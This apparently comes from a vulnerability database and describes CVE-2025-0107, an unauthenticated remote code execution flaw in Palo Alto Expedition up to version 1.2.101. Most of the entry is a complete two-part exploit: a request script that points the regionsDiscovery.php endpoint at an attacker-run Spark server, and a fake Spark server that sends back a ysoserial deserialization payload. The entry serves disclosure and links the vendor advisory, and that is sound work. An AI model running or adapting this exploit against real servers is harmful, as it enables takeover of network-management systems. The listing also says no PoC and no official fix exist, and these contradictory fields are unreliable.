SSV-99913
Abstract
Vulnerability overview: Palo Alto Expedition RCE vulnerability (CVE-2025-0107)
Body
Palo Alto Expedition RCE vulnerability (CVE-2025-0107)

Basic fields
- Vulnerability ID: SSV-99913
- Disclosure/discovery date: unknown
- Submission date: 2025-01-23
- Severity: (not set)
- Category: command execution
- Affected component: Palo Alto Expedition (version <= 1.2.101)
- Vulnerability author: unknown
- Submitter: Knownsec
- CVE-ID: CVE-2025-0107
- CNNVD-ID: (not provided)
- CNVD-ID: (not provided)
- ZoomEye Dork: (not provided)
- Source: https://ssd-disclosure.com/ssd-advisory-palo-alto-expedition-rce-regionsdiscovery/

Vulnerability details

## Summary

A vulnerability in Palo Alto Expedition allows remote attackers who can reach the web interface to execute arbitrary code.

## Credit

An independent security researcher working with SSD Secure Disclosure.

## Vendor Response

Palo Alto has released the following advisory and fix: https://security.paloaltonetworks.com/PAN-SA-2025-0001

## Affected Versions

Palo Alto Expedition version 1.2.101 and prior

## CVE

CVE-2025-0107

## Technical Analysis

The /API/regionsDiscovery.php endpoint takes the address of the Apache Spark master it should contact from the request itself (the `master` parameter in the exploit below), so an unauthenticated attacker can make the Expedition server connect to a Spark server under the attacker's control. The fake Spark server answers that connection with a Java payload (in the server below, a ysoserial-generated serialized object), which the Palo Alto Expedition server then deserializes and executes, giving arbitrary code execution.

## Exploit

```
#!/usr/bin/python3
# Exploit
import sys

import requests

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("python3 exp.py https://127.0.0.1 8.8.8.8:1234")
        sys.exit(0)

    url = sys.argv[1]          # Expedition base URL
    spark_addr = sys.argv[2]   # host:port of the fake Spark server

    # The "master" parameter is the attacker-controlled Spark master address;
    # the remaining parameters only need to satisfy the endpoint's input checks.
    params = {
        "master": f"spark://{spark_addr}",
        "mask": "26",
        "project": "your_project",
        "devices": "device1,device2",
        "mtserver": "127.0.0.1:3306",
        "mtuser": "root",
        "mtpassword": "paloalto",
        "task-id": "1193",
        "mode": "pre-analysis",
        "regions": "",
        "parquetPath": "/tmp",
        "timezone": "Europe/Helsinki",
        "mlserver": "127.0.0.1",
        "debug": "false",
        "initDate": "2023-01-01",
        "endDate": "2023-01-31",
    }

    res = requests.get(
        f"{url}/API/regionsDiscovery.php",
        params=params,
        verify=False,
    )
    print(f"exploit ok! {res}")
```

```
#!/usr/bin/python3
# Fake Spark Server
import os
import struct
import sys
from socketserver import BaseRequestHandler, ThreadingTCPServer


class EchoHandler(BaseRequestHandler):
    def handle(self):
        print("Got connection from %s" % (str(self.client_address)))
        while True:
            msg = self.request.recv(8192)
            print(msg)
            if not msg:
                break
            if len(msg) > 16:
                # Bytes 9..17 of the client's message carry the request id,
                # which is echoed back in the response header.
                print("Send msg>>>")
                self.request.sendall(build_msg(msg[9:17]))


def build_msg(request_id):
    # Read the payload as binary data
    payloadObj = open(sys.argv[2], "rb").read()
    msg_type = b"\x04"
    head_length = 21
    # Construct message: total length, message type, request id, payload length, payload
    msg = struct.pack(">Q", len(payloadObj) + head_length) + msg_type + request_id
    msg += struct.pack(">I", len(payloadObj)) + payloadObj
    return msg


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(
            "Usage: python %s <port / 3306> </path/to/payload>"
            % os.path.basename(sys.argv[0])
        )
        print(
            'java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/hack" > payload'
        )
        sys.exit()

    serv = ThreadingTCPServer(("0.0.0.0", int(sys.argv[1])), EchoHandler)
    print("Server listening on 0.0.0.0:%s" % sys.argv[1])
    serv.serve_forever()
```

PoC: none available.

Reference links: none listed.

Solutions
- Temporary solution: none available.
- Official solution: none available.
- Protection solution: none available.

Timeline
- 2025-01-23: Knownsec discovered/disclosed the vulnerability.
- 2025-01-23: Knownsec submitted the vulnerability.
- Knownsec submitted additional vulnerability details.

Related vulnerabilities
- Palo Alto Expedition RCE vulnerability (CVE-2025-0107)
- Palo Alto Expedition multiple vulnerabilities (CVE-2024-5910 & CVE-2024-9464 & CVE-2024-9465 & CVE-2024-9463)
Tags
- source:seebug
- type:vuln
Extended fields
{
"ssvid": "ssvid-99913"
}